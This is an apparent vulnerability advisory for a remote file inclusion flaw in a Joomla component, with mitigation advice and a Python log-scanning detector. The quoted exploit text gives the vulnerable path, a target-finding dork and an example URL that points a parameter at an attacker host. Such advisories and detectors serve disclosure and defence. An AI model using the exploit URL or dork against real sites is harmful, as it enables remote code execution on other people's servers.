Vendor: Joomla Flash Fun! Component
By: Unknown
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Joomla Flash Fun! Component
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla Flash Fun! Component RFI

This vulnerability allows an attacker to include a remote file by manipulating the 'mosConfig_live_site' variable in the 'admin.joomlaflashfun.php' file of the Joomla Flash Fun! component. By injecting a malicious file, an attacker can execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the Joomla Flash Fun! component or remove it if not needed. Additionally, ensure that user input is properly validated and sanitized to prevent remote file inclusion attacks.
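
An added example, not part of the original advisory or the component's code: a Python check over web server access logs that flags requests to the script and parameter named above and marks those whose value points at another host. The log format (Apache common/combined), the sample lines, and the names `classify` and `scan` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script path and parameter named in the advisory.
SCRIPT = "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php"
PARAM = "mosConfig_live_site"
# Client, request target and status from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A value of the form scheme://host or //host points at another server.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

# Constructed sample lines (documentation IP ranges, placeholder host).
_TS = "[15/Sep/2007:10:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_TS} "GET /2007{SCRIPT}?{PARAM}=http://files.example/x.txt? HTTP/1.1" 200 512',
    f'198.51.100.9 - - {_TS} "GET {SCRIPT}?mosConfig%5Flive%5Fsite=hTTp%3A%2F%2Ffiles.example%2Fx HTTP/1.0" 404 0',
    f'192.0.2.44 - - {_TS} "GET {SCRIPT} HTTP/1.1" 200 87',
    f'192.0.2.50 - - {_TS} "GET /index.php?option=com_content HTTP/1.1" 200 4000',
]


def classify(line):
    """Return (client, status, verdict) for a request to the script, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    path, _, query = target.partition("?")
    # Decode and normalise the path so encodings or doubled slashes do not hide it.
    path = re.sub(r"/+", "/", unquote(path))
    if not path.lower().endswith(SCRIPT):
        return None
    params = dict(parse_qsl(query, keep_blank_values=True))
    if PARAM not in params:
        # Direct request to the component file without the parameter; still worth review.
        return client, status, "direct-access"
    value = unquote(params[PARAM])  # second decode also flags double-encoded probes
    verdict = "remote-include" if REMOTE_RE.match(value) else "param-set"
    return client, status, verdict


def scan(lines):
    """Classify every line and keep only requests that touched the script."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE_LOG):
        print(client, status, verdict)
```

A `remote-include` hit answered with status 200 is the case to triage first, since the server processed the request rather than rejecting it.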

Exploit-DB raw data:

######################################
# Joomla Flash Fun! Component RFI    #
######################################

Bug in :
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joomlaflashfun"

Example:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# milw0rm.com [2007-09-15]